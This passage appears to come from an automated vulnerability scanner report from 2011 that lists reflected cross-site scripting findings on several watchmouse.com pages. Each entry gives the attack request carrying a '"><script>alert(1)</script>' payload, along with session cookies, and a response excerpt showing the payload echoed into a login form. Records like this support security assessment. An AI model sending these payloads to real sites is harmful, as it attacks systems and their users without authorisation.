Request

GET /en/non_profit_offering.php?89f8a"><script>alert(1)</script>c74a747cb5=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-bdc8a9c092288881895e9b1725c491d5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/non_profit_offering.php?89f8a"><script>alert(1)</script>c74a747cb5=1" method="post">
...[SNIP]...

1.186. http://www.watchmouse.com/en/our_promise.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/our_promise.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a38c0"><script>alert(1)</script>5e615693d87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ena38c0"><script>alert(1)</script>5e615693d87/our_promise.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-00da540cc403e3901ab5a98adb3587f8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ena38c0"><script>alert(1)</script>5e615693d87/our_promise.php" method="post">
...[SNIP]...

1.187. http://www.watchmouse.com/en/our_promise.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/our_promise.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4051e"><script>alert(1)</script>484adfeedff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/our_promise.php4051e"><script>alert(1)</script>484adfeedff HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-63b5000df0544834477c83d41b1c1fa8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/our_promise.php4051e"><script>alert(1)</script>484adfeedff" method="post">
...[SNIP]...

1.188. http://www.watchmouse.com/en/our_promise.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/our_promise.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36641"><script>alert(1)</script>cc9a59dcd9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/our_promise.php?36641"><script>alert(1)</script>cc9a59dcd9e=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-1e3c0bfb1f28cafcffcdadf0225fe588"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/our_promise.php?36641"><script>alert(1)</script>cc9a59dcd9e=1" method="post">
...[SNIP]...

1.189. http://www.watchmouse.com/en/passwd.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/passwd.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84acb"><script>alert(1)</script>2f2d6b3cdb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en84acb"><script>alert(1)</script>2f2d6b3cdb6/passwd.php?mlang=en HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.13.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-f620eef0153b9c80bda770b6a3163076"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en84acb"><script>alert(1)</script>2f2d6b3cdb6/passwd.php?mlang=en" method="post">
...[SNIP]...

1.190. http://www.watchmouse.com/en/passwd.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/passwd.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e567f"><script>alert(1)</script>1d6e35d6ae8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/passwd.phpe567f"><script>alert(1)</script>1d6e35d6ae8?mlang=en HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.13.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-8d8ca59c7587a7e0ea69593bff710c61"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/passwd.phpe567f"><script>alert(1)</script>1d6e35d6ae8?mlang=en" method="post">
...[SNIP]...

1.191. http://www.watchmouse.com/en/ping.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/ping.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acd89"><script>alert(1)</script>70bd0208e1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enacd89"><script>alert(1)</script>70bd0208e1d/ping.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d0742f5ada7518ecc189a46a864fc8d9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enacd89"><script>alert(1)</script>70bd0208e1d/ping.php" method="post">
...[SNIP]...

1.192. http://www.watchmouse.com/en/ping.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/ping.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f631d"><script>alert(1)</script>aac2f1df69f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/ping.phpf631d"><script>alert(1)</script>aac2f1df69f HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e84a932fa92b56c1ee50bc0c13e42517"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ping.phpf631d"><script>alert(1)</script>aac2f1df69f" method="post">
...[SNIP]...

1.193. http://www.watchmouse.com/en/ping.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/ping.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47f4e"><script>alert(1)</script>52c0b0a610f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/ping.php?47f4e"><script>alert(1)</script>52c0b0a610f=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b9845305c64c7fb7439150eb4e5227bf"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ping.php?47f4e"><script>alert(1)</script>52c0b0a610f=1" method="post">
...[SNIP]...

1.194. http://www.watchmouse.com/en/plans_price.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/plans_price.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b18c5"><script>alert(1)</script>056e37b8466 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb18c5"><script>alert(1)</script>056e37b8466/plans_price.php HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-e36c617bad6f75d9f867d96c4fdf941a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb18c5"><script>alert(1)</script>056e37b8466/plans_price.php" method="post">
...[SNIP]...

1.195. http://www.watchmouse.com/en/plans_price.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/plans_price.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd20d"><script>alert(1)</script>9b1a4de0c5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/plans_price.phpfd20d"><script>alert(1)</script>9b1a4de0c5f HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:31 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-572e1b99c6b409ad046af4796587dff1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/plans_price.phpfd20d"><script>alert(1)</script>9b1a4de0c5f" method="post">
...[SNIP]...

1.196. http://www.watchmouse.com/en/plans_price.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/plans_price.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d899"><script>alert(1)</script>87dab0eebd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/plans_price.php?6d899"><script>alert(1)</script>87dab0eebd5=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.1.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 11:59:27 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-5b19fcea6f723e9bf2d075d7b46c3eda"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 55109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/plans_price.php?6d899"><script>alert(1)</script>87dab0eebd5=1" method="post">
...[SNIP]...

1.197. http://www.watchmouse.com/en/press.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/press.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1bb5"><script>alert(1)</script>a6b74324670 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb1bb5"><script>alert(1)</script>a6b74324670/press.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e2eab2f7ad4354f168093787bd73f4db"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb1bb5"><script>alert(1)</script>a6b74324670/press.php" method="post">
...[SNIP]...

1.198. http://www.watchmouse.com/en/press.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/press.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9964"><script>alert(1)</script>b39620f6cf2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/press.phpa9964"><script>alert(1)</script>b39620f6cf2 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
